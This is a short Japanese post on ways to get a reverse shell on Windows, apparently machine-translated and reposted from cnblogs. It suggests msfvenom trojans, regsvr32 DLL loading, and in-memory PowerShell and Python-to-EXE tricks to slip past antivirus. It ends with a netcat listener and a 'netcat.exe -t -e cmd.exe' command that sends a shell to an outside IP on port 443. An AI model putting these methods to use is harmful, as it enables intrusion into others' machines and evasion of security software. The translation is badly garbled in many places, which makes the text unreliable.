Windowsのリバウンドシェル方法

まず、exeファイルのプログラムのリバウンドシェルを実行します

氏トロイの木馬は、exeファイルのexeファイルと、サーバーにアップロードし、最終的にサーバー上のファイルを実行する必要があります。Msfvenomは、exeファイルトロイの木馬を生成するために使用することができます。

第二に、DLLファイルのリバウンドシェルを読み込みます

氏のDLLファイルへの必要性と、その後REGSVR32.EXE DLLをロードします。Msfvenomは、DLLファイルを生成するために使用することができます。

三、PowerShellのリバウンドシェル

通常、PowerShellのコードがメモリに直接ロードされているので、できる効果的傍受上のウイルス対策ソフトウェアバイパスコードPowerShellのリバウンドシェルを実行することにより、ディスク上の任意の悪意のあるファイルを作成しません、彼らはソフトキルが監視バイパスすることができます。コバルトストライクは、Webスクリプティング機能の配信を使用することができますシェルを回復しました。

第四に、リバウンドシェルスクリプト言語

PHP、Pythonの、シェルスクリプト言語のプログラムを実行することにより、シェルをリバウンドすることができます。Msfvenomは、スクリプト言語の多様性を生成するために使用することができます。

五、Pythonのシェルスクリプトリバウンドexeファイルを変換します

exeファイルのプログラムに変換するPythonスクリプトは、効果的にアンチウイルスソフトウェアの検出バイパス殺すこと自由に達成することができます。

六、netcatをリバウンドシェル

VPS上のリスニングポート:netcatを-l -p 443

サーバー上で実行されていると非難:netcat.exe -t -e cmd.exeの16.79.5.26 443

...

おすすめ

転載: www.cnblogs.com/dgjnszf/p/12317025.html